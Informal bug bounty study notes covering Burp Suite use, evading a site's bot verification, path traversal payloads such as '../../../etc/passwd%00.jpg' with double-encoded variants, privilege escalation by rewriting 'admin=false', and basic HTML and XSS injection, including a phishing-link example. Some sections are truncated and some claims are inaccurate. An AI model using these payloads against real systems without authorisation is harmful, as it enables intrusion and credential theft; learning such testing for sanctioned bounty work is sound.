Bug Bounty Steps
Bug Bounty Steps
- use: /robots.txt
after any targeted website to see the pages that are hidden from end users
- guess the hidden folders if the robots.txt is empty (ex: /database, /backups,
/users..)
- Use Burpsuit tool to manipulate our requests using its proxy feature
- When using Burpsuit tool, some strong websites like Udemy might detect that we
are connecting to its website using burbsuit, and require confirmation that we're
not a bot (click to verify that you're human)
and to avoid this problem, we enable the (emulate Android) feature, or emulate
IE /IOS
from the "Proxy" window, then "options" sub window, then the Match and replace
section
this way, the Udemy website will see us as an adroind device, and skip its
verification method
basicly it means that a user can reach information or alter information that he
does not have access to
It's always a good aproach to use 2 accoutns when searching for a bug in a webstie
an account that you create as a test to try to reach its information
and an account as a bug bounty hunter
*
- we can add "match roles" in the "option" window of "proxy" page of burpsuite
for example: add a role to match for: "admin=false" to be replaced with
"admin=true"
this will always to login as admin if the account exists and enabled in a website
- if we reached a page where it has passwords of other accoutns but are shown as
stars ******
we can view them as charcters using this method:
* Path Traversal:
It allows the hunter to reach the directories and fodlers in the web server
- It's mostly about manipulating the Get requests using the burpsuit tool, trying
to reach a directory that is important like (/) or (/etc)...
- Sometimes, the developer may only allow a specific type of file to be accessed
using the Get request (ex: only jpg files)
and to solve this problem, we can add the jpg extention to our target file like
below:
../../../etc/passwd%00.jpg
Or, if the Get request is being sent using the full path (ex:
/var/www/images/image23/jpg)
and we're getting error when chaniging it to our target path (ex: /etc/passwd )
then, we can keep the default path, and back from it to our target path (ex:
/var/www/images/../../../etc/passwd)
- Sometimes, the developer filters all the (/) in the Get request, and to solve
this, we can try to encode the (/) in burpsuit:
we start by selecting the "/" in our Get request, then "righ click" and choose
"convert selection", select "URL" and then "url encoded all charcters"
this will transfer our "/" to "%2f" which will not filtered, and will be translated
by the webstite to "/"
Or, even the developer might filter our encoded "/" which is "%2f", so we use the
"%252f" which means "//"
one of them will filtered by the website, and the other will be read
and our target path will be for example: ..%252f..%252f..%252fetc%252fpasswd
- we can use the "intruder" windows in burpsuit to add the payloads that we want to
try automatically to the targer website instead of
wasting our time testing them manually one by one
It lets the attacker to inject java scripts codes (or HTML) inside the page (client
side)
and it has three types (Reflected XSS, Stored XSS, DOM Based XSS)
the difference between them is how the attacker deliver his code to the web page
- the HTML injection is less dangerous than Java injection, but it's also simpler
So, we can start with it to check if there's a Java injection vulnerbility or not
the easiest way to start is to look for an inout field (ex: search bar) and start
entering simple HTML code inside it
ex:<b>Hello</b> , if the result was the word Hello in bald, it means that the web
page is vulnerble for HTML injection
- after knowing that the webpage is vulnerble to injection, we can inject more
dangerouse codes (html or java)
ex: <a href="link to login page to steal the users accounts">click here</a>
or: <script>alert("hacked");</script> whih when run, will send a pop
up saying "hacked"